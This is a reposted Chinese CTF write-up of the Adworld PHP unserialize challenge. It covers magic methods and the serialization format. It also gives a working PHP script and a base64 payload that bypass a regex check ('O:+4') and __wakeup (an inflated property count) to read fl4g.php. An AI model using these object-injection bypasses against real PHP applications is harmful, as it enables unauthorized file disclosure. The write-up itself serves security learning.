php安全攻防世界unserialize函数反序列化示例详解

2023-01-21 0 4,473

猪小侠源码,https://www.20zxx.cn/

php安全攻防世界unserialize函数反序列化示例详解

步骤

首先打开题目,发现给了一段源码:
php安全攻防世界unserialize函数反序列化示例详解
分析源码,发现类里面有三个魔术方法:
__construct():构造函数,对类的变量进行初始化,创建时自动调用,用得到的参数覆盖$file
__destruct():销毁时调用,会显示文件的代码,这里要显示fl4g.php
__wakeup():在进行反序列化之前会调用,会把$file重置成index.php

正则表达式的含义:o或c开头,冒号,一个或多个数字,不区分大小写

ok,分析完毕:我们要将序列化后的字符串进行base64加密之后进行get传参到var变量即可
但是这里我们可以看出需要绕过__wakeup()函数以及正则匹配,才能够拿到flag
__wakeup()方法绕过方法:当成员属性的数目大于实际数目的时候即可绕过此方法
正则匹配我们可以使用+来进行绕过
代码:

<?php
class Demo {
private $file = \'index.php\';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != \'index.php\') {
//the secret is in the fl4g.php
$this->file = \'index.php\';
}
}
}

$a = new Demo(\"fl4g.php\");// 传入我们需要显示的文件
$b = serialize($a);// 进行序列化
echo $b;// O:4:\"Demo\":1:{s:10:\"Demofile\";s:8:\"fl4g.php\";}
$b = str_replace(\"O:4\", \"O:+4\", $b);// 绕过正则匹配
$b = str_replace(\"1:{\",\"2:{\",$b);// 绕过__wakeup()方法

echo base64_encode($b);// 进行base64编码并输出
?>

payload:var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

php安全攻防世界unserialize函数反序列化示例详解
成功拿到flag~
注意:这里有个坑,要是直接将序列化之后的字符串进行手动修改再去找在线网站进行加密则会发现编码之后和我们payload里的不太一样
php安全攻防世界unserialize函数反序列化示例详解
这是因为file变量为私有变量,所以序列化之后的字符串开头和结尾各有一个空白字符,而我们在对序列化之后的字符串进行输出时,浏览器则不显示空字符,如图:
php安全攻防世界unserialize函数反序列化示例详解
细心的朋友也会发现Demofile只有8个字符,而长度却显示10。
所以正确的序列化字符串应该是

O:4:\"Demo\":1:{s:10:\" Demo file\";s:8:\"fl4g.php\";}

而我们由于是使用php代码直接进行编码的,全自动化,自然不会漏掉空字符。
解释一下php序列化字符串的格式:
首先对象类型分为以下几种

a - array                          b - boolean
d - double                        i - integer
o - common object           r - reference
s - string                         C - custom object
O - class                         N - null
R - pointer reference       U - unicode string

格式:对象类型:长度:\"类名\":类中变量的个数:{类型:长度:\"值\";类型:长度:\"值\";......}

总结

考察对php中魔术方法的熟悉程度,以及反序列化的应用
以上就是攻防世界Web php unserialize正则表达式反序列化详解的详细内容,更多关于php攻防世界unserialize正则表达式反序列化的资料请关注其它相关文章!

猪小侠源码,https://www.20zxx.cn/

:本文采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可, 转载请附上原文出处链接。
1、本站提供的源码不保证资源的完整性以及安全性,不附带任何技术服务!
2、本站提供的模板、软件工具等其他资源,均不包含技术服务,请大家谅解!
3、本站提供的资源仅供下载者参考学习,请勿用于任何商业用途,请24小时内删除!
4、如需商用,请购买正版,由于未及时购买正版发生的侵权行为,与本站无关。
5、本站部分资源存放于百度网盘或其他网盘中,请提前注册好百度网盘账号,下载安装百度网盘客户端或其他网盘客户端进行下载;
6、本站部分资源文件是经压缩后的,请下载后安装解压软件,推荐使用WinRAR和7-Zip解压软件。
7、如果本站提供的资源侵犯到了您的权益,请邮件联系: 442469558@qq.com 进行处理!

猪小侠源码-最新源码下载平台 PHP教程 php安全攻防世界unserialize函数反序列化示例详解 http://www.20zxx.cn/464266/xuexijiaocheng/qes.html

猪小侠源码,优质资源分享网

常见问题
  • 本站所有资源版权均属于原作者所有,均只能用于参考学习,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担
查看详情
  • 最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,建议提前注册好百度网盘账号,使用百度网盘客户端下载
查看详情

相关文章

官方客服团队

为您解决烦忧 - 24小时在线 专业服务